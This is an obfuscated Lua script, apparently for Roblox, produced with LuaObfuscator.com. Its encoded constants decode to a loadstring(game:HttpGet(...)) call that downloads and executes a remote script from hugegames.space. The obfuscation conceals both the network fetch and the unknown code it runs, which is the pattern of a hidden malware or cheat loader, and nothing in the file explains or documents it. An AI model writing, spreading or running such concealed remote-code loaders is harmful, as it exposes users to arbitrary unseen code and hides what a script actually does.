--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if v19 then local v86=v5(v80,v19);v19=nil;return v86;else return v80;end end end);local function v20(v31,v32,v33) if v33 then local v81=(v31/((5 -3)^(v32-((1067 -(68 + 997)) -1))))%((1 + (1271 -(226 + 1044)))^(((v33-(1 -(0 -0))) -(v32-(2 -1))) + (620 -(555 + (181 -(32 + 85)))))) ;return v81-(v81%(932 -(840 + 17 + 74))) ;else local v82=(570 -(367 + 201))^(v32-(1 -(0 + 0))) ;return (((v31%(v82 + v82))>=v82) and 1) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + 2 ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(1 -(952 -(802 + 150)))) then return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * (436 -(67 + 113))) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -(10 -6)) );v18=v18 + 3 + 1 ;v37=3 -2 ;end end end local function v24() local v42=v23();local v43=v23();local v44=(3 -2) -0 ;local v45=(v20(v43,1 + 0 ,(437 + 580) -(915 + 82) ) * (2^32)) + v42 ;local v46=v20(v43,59 -(66 -28) ,19 + 12 );local v47=((v20(v43,32)==(1 -0)) and  -(439 -(145 + 293))) or ((1618 -(44 + 386)) -(1069 + 118)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * 0 ;else v46=1 + 0 ;v44=0 -0 ;end elseif (v46==(2031 + 16)) then return ((v45==(1486 -(998 + 488))) and (v47 * ((792 -(368 + 135 + 288))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/(((6 + 1) -5)^(494 -((1188 -(201 + 571)) + 26))))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(1141 -(116 + 1022))) then return v6(v51);end if (v49==(0 -(0 -0))) then v50=nil;if  not v48 then v48=v23();if (v48==((1080 -(1020 + 60)) + 0)) then return "";end end v49=3 -2 ;end if (v49==(7 -5)) then v51={};for v87=860 -(814 + 45) , #v50 do v51[v87]=v2(v1(v3(v50,v87,v87)));end v49=7 -(1427 -(630 + 793)) ;end if (v49==(1 + (0 -0))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=887 -(261 + 624) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(1 -0)) then v55=nil;v56=nil;v52=2 -0 ;end if (v52~=(0 -0)) then else local v85=0;while true do if (v85~=(286 -(134 + 151))) then else v52=1666 -(970 + 695) ;break;end if ((0 -0)==v85) then v53=0;v54=nil;v85=1;end end end if (v52~=(1992 -(582 + 1408))) then else v57=nil;v58=nil;v52=10 -7 ;end if (3==v52) then v59=nil;while true do local v89=0;while true do if (v89~=1) then else if (v53~=(1 -0)) then else local v96=0;while true do if (v96~=2) then else v53=2;break;end if (v96==(3 -2)) then for v102=1,v58 do local v103=1824 -(1195 + 629) ;local v104;local v105;local v106;while true do if (v103~=1) then else v106=nil;while true do if (v104~=(1 -0)) then else if (v105==(242 -(187 + 54))) then v106=v21()~=(780 -(162 + 618)) ;elseif (v105==(2 + 0)) then v106=v24();elseif (v105==(2 + 1)) then v106=v25();end v59[v102]=v106;break;end if (v104==0) then local v155=0;while true do if (v155==0) then v105=v21();v106=nil;v155=1 -0 ;end if ((1 -0)==v155) then v104=1;break;end end end end break;end if (v103==0) then v104=0;v105=nil;v103=1 + 0 ;end end end v57[3]=v21();v96=2;end if (v96~=(1636 -(1373 + 263))) then else v58=v23();v59={};v96=1001 -(451 + 549) ;end end end break;end if (v89==0) then if (v53~=(0 + 0)) then else local v97=0;local v98;while true do if ((0 -0)==v97) then v98=0;while true do if (v98==1) then v56={};v57={v54,v55,nil,v56};v98=2;end if (v98==(1 + 1)) then v53=1;break;end if (v98==0) then v54={};v55={};v98=1;end end break;end end end if (v53==(2 -0)) then local v99=341 -(218 + 123) ;local v100;while true do if (v99==(1581 -(1535 + 46))) then v100=0 + 0 ;while true do local v107=0 + 0 ;while true do if (0~=v107) then else if (v100==0) then local v153=0;while true do if (0==v153) then for v156=561 -(306 + 254) ,v23() do local v157=0 + 0 ;local v158;while true do if (v157==(0 -0)) then v158=v21();if (v20(v158,1,1468 -(899 + 568) )==(0 + 0)) then local v161=0 -0 ;local v162;local v163;local v164;local v165;while true do if (v161==0) then local v166=603 -(268 + 335) ;while true do if (v166==1) then v161=1;break;end if (v166~=0) then else v162=0;v163=nil;v166=1;end end end if (v161==(292 -(60 + 230))) then while true do if (v162==3) then if (v20(v164,3,575 -(426 + 146) )~=(1 + 0)) then else v165[1460 -(282 + 1174) ]=v59[v165[815 -(569 + 242) ]];end v54[v156]=v165;break;end if (v162==2) then local v168=0;while true do if (v168~=1) then else v162=3;break;end if ((0 -0)==v168) then local v175=0 + 0 ;while true do if (1~=v175) then else v168=1025 -(706 + 318) ;break;end if (v175~=(1251 -(721 + 530))) then else if (v20(v164,1272 -(945 + 326) ,2 -1 )==1) then v165[2 + 0 ]=v59[v165[2]];end if (v20(v164,702 -(271 + 429) ,2 + 0 )~=(1501 -(1408 + 92))) then else v165[3]=v59[v165[3]];end v175=1;end end end end end if (v162~=(1086 -(461 + 625))) then else local v169=1288 -(993 + 295) ;while true do if (v169~=(0 + 0)) then else local v176=0;while true do if (v176==1) then v169=1172 -(418 + 753) ;break;end if (v176~=0) then else v163=v20(v158,1 + 1 ,1 + 2 );v164=v20(v158,4,6);v176=1;end end end if ((1 + 0)~=v169) then else v162=1 + 0 ;break;end end end if (1==v162) then v165={v22(),v22(),nil,nil};if (v163==(0 + 0)) then local v172=0;local v173;local v174;while true do if (v172==(1323 -(1249 + 73))) then while true do if (v173==(0 + 0)) then v174=0;while true do if (v174==(1145 -(466 + 679))) then v165[6 -3 ]=v22();v165[4]=v22();break;end end break;end end break;end if (v172==0) then v173=0 -0 ;v174=nil;v172=1901 -(106 + 1794) ;end end elseif (v163==(1 + 0)) then v165[3]=v23();elseif (v163==2) then v165[1 + 2 ]=v23() -((5 -3)^(43 -27)) ;elseif (v163==3) then local v183=114 -(4 + 110) ;local v184;local v185;local v186;while true do if (v183==1) then v186=nil;while true do if (0==v184) then local v189=0;while true do if (v189==1) then v184=585 -(57 + 527) ;break;end if (v189==0) then v185=1427 -(41 + 1386) ;v186=nil;v189=104 -(17 + 86) ;end end end if (v184~=(1 + 0)) then else while true do if (0~=v185) then else v186=0;while true do if (v186==(0 -0)) then v165[8 -5 ]=v23() -((168 -(122 + 44))^16) ;v165[4]=v22();break;end end break;end end break;end end break;end if (v183==(0 -0)) then v184=0;v185=nil;v183=3 -2 ;end end end v162=2;end end break;end if (1==v161) then v164=nil;v165=nil;v161=2 + 0 ;end end end break;end end end for v159=1 + 0 ,v23() do v55[v159-1 ]=v28();end v153=1;end if ((1 -0)==v153) then v100=66 -(30 + 35) ;break;end end end if (v100==(1 + 0)) then return v57;end break;end end end break;end end end v89=1;end end end break;end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v83=0,v74 do if (v83>=v68) then v72[v83-v68 ]=v73[v83 + 1 ];else v76[v83]=v73[v83 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v84=0;while true do if (v84==0) then v78=v66[v70];v79=v78[1];v84=1;end if (v84==1) then if (v79<=6) then if (v79<=2) then if (v79<=0) then v76[v78[2]]();elseif (v79==1) then local v108=v78[2];local v109,v110=v69(v76[v108](v13(v76,v108 + 1 ,v78[3])));v71=(v110 + v108) -1 ;local v111=0;for v135=v108,v71 do local v136=0;while true do if (v136==0) then v111=v111 + 1 ;v76[v135]=v109[v111];break;end end end else v76[v78[2]]=v62[v78[3]];end elseif (v79<=4) then if (v79==3) then local v114=v78[2];v76[v114]=v76[v114](v13(v76,v114 + 1 ,v71));else local v116=v78[2];v76[v116]=v76[v116](v13(v76,v116 + 1 ,v71));end elseif (v79==5) then local v118=0;local v119;local v120;while true do if (v118==0) then v119=v78[2];v120=v76[v78[3]];v118=1;end if (v118==1) then v76[v119 + 1 ]=v120;v76[v119]=v120[v78[4]];break;end end else do return;end end elseif (v79<=9) then if (v79<=7) then do return;end elseif (v79==8) then local v121=0;local v122;local v123;while true do if (1==v121) then v76[v122 + 1 ]=v123;v76[v122]=v123[v78[4]];break;end if (v121==0) then v122=v78[2];v123=v76[v78[3]];v121=1;end end else v76[v78[2]]();end elseif (v79<=11) then if (v79>10) then local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==0) then v125=v78[2];v126,v127=v69(v76[v125](v13(v76,v125 + 1 ,v78[3])));v124=1;end if (v124==1) then v71=(v127 + v125) -1 ;v128=0;v124=2;end if (v124==2) then for v150=v125,v71 do v128=v128 + 1 ;v76[v150]=v126[v128];end break;end end else v76[v78[2]]=v78[3];end elseif (v79>12) then v76[v78[2]]=v78[3];else v76[v78[2]]=v62[v78[3]];end v70=v70 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F3833366432623033613035313566346531323835653833662E6C756100083O00120C3O00013O00120C000100023O00200800010001000300120A000300044O000B000100034O00035O00026O000100012O00073O00017O00",v9(),...);
